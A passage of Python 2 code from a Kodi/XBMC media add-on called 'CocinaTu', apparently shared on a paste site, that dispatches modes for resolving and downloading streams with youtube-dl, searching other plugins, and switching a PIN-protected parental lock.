    addon_log("youtubedl")
    try:
        import youtubedl
    except Exception:
        xbmc.executebuiltin("XBMC.Notification(CocinaTu,Please [COLOR yellow]install Youtube-dl[/COLOR] module ,10000,"")")
    stream_url=youtubedl.single_YD(url)
    playsetresolved(stream_url,name,iconimage)
elif mode==19:
    # Resolve via urlresolver-style file-host resolvers.
    addon_log("Genesiscommonresolvers")
    playsetresolved (urlsolver(url),name,iconimage,True)

elif mode==21:
    # Download whatever is currently playing; a '[mp3]' tag selects audio.
    addon_log("download current file using youtube-dl service")
    mtype='video'
    if '[mp3]' in name:
        mtype='audio'
        name=name.replace('[mp3]','')
    ytdl_download('',name, mtype)
elif mode==23:
    addon_log("get info then download")
    mtype='video'
    if '[mp3]' in name:
        mtype='audio'
        name=name.replace('[mp3]','')
    ytdl_download(url,name,mtype)
elif mode==24:
    addon_log("Audio only youtube download")
    ytdl_download(url,name,'audio')
elif mode==25:
    addon_log("Searchin Other plugins")
    _search(url,name)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==55:
    # Ask for the parental PIN; on a match, disable the block flag.
    addon_log("enabled lock")
    parentalblockedpin =addon.getSetting('parentalblockedpin')
    keyboard = xbmc.Keyboard('','introduzca la contraseña')
    keyboard.doModal()
    if not (keyboard.isConfirmed() == False):
        newStr = keyboard.getText()
        if newStr==parentalblockedpin:
            addon.setSetting('parentalblocked', "false")
            xbmc.executebuiltin("XBMC.Notification(CocinaTu,Control Parental On,5000,"+icon+")")
        else:
            xbmc.executebuiltin("XBMC.Notification(CocinaTu, olvido la clave?? ,5000,"+icon+")")
    xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==56:
    # Re-enable the parental block (no PIN required to lock).
    addon_log("disable lock")
    addon.setSetting('parentalblocked', "true")
    xbmc.executebuiltin("XBMC.Notification(CocinaTu, Control Parental Off,5000,"+icon+")")
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==53:
    # Browse another plugin's directory through JSON-RPC.
    addon_log("Requesting JSON-RPC Items")
    pluginquerybyJSON(url)

# Apply a saved container view mode, if any handler set one.
if not viewmode==None:
    print 'setting view mode'
    xbmc.executebuiltin("Container.SetViewMode(%s)"%viewmode)
Add Comment
Please, Sign In to add comment